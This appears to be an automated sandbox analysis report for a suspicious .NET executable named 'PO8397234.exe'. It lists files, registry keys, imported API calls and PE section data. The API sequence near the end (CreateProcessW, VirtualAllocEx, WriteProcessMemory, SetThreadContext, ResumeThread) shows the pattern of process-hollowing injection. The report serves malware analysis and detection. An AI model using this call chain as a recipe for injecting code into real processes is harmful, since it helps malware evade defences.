C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Rebecca\AppData\Local\Temp\en-US\Lazarus.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en-US\Lazarus.resources\Lazarus.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en-US\Lazarus.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\en-US\Lazarus.resources\Lazarus.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\en\Lazarus.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en\Lazarus.resources\Lazarus.resources.dll
C:\Users\Rebecca\AppData\Local\Temp\en\Lazarus.resources.exe
C:\Users\Rebecca\AppData\Local\Temp\en\Lazarus.resources\Lazarus.resources.exe
C:\Windows\System32\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe.config
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\6715dc4d04e35f16d482900c355325e9\mscorlib.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol224.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\43822396682b0ffc3cfb66137ddab95f\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\2c462a934e0586ac5e46c8b93e461384\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\aece3d371c0714e60f9509d2a3137395\System.Windows.Forms.ni.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c8a2021e940773064c655a6ea6ee8cb2\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\6090b158fd3d10686b422a455e188125\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Windows\System32\ntdll.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PO8397234.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FeatureSIMD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index224
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-479431668-4257340731-3059248302-1002\Installer\Assemblies\C:|Users|Rebecca|AppData|Local|Temp|PO8397234.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Rebecca|AppData|Local|Temp|PO8397234.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Rebecca|AppData|Local|Temp|PO8397234.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-479431668-4257340731-3059248302-1002\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml.Linq__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\PO8397234.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\169BB6ED
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FeatureSIMD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index224
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\169BB6ED
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPSampledIn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
DisableUserModeCallbackFilter
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.SetDefaultDllDirectories
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.ReleaseSRWLockExclusive
advapi32.dll.EventRegister
advapi32.dll.EventSetInformation
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
user32.dll.GetProcessWindowStation
user32.dll.GetUserObjectInformationW
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.AddDllDirectory
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
kernel32.dll.GetFullPathNameW
uxtheme.dll.IsAppThemed
kernel32.dll.CreateActCtxA
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
user32.dll.RegisterWindowMessageW
ole32.dll.CoCreateGuid
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.CompareStringOrdinal
kernel32.dll.SetThreadErrorMode
kernel32.dll.GetFileAttributesExW
kernel32.dll.ResolveLocaleName
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipLoadImageFromStream
windowscodecs.dll.DllGetClassObject
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageType
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.CreateProcessW
kernel32.dll.GetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.WriteProcessMemory
kernel32.dll.SetThreadContext
kernel32.dll.ResumeThread
ole32.dll.CoWaitForMultipleHandles
advapi32.dll.EventUnregister
sechost.dll.LookupAccountNameLocalW
gdiplus.dll.GdipDisposeImage
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
cryptsp.dll.CryptReleaseContext
"{path}"
C:\Users\Rebecca\AppData\Local\Temp\PO8397234.exe "{path}"

BinGraph Download graph

PE Information

Image Base Entry Point Reported Checksum Actual Checksum Minimum OS Version Compile Time Import Hash Icon Icon Exact Hash Icon Similarity Hash
0x00400000 0x00442efa 0x00000000 0x0004b291 4.0 2020-06-30 07:13:04 f34d5f2d4577ed6d9ceec516c1f5a744 da86b69773b3d1a0cab558dba35d1d3e c8294825238e779bae8cb9c502157251

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00000200 0x00002000 0x00040f00 0x00041000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 7.83
.rsrc 0x00041200 0x00044000 0x00007fc0 0x00008000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.85
.reloc 0x00049200 0x0004c000 0x0000000c 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 0.10

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_ICON 0x00049490 0x000025a8 LANG_NEUTRAL SUBLANG_NEUTRAL 6.60 None
RT_GROUP_ICON 0x0004ba4c 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 2.46 None
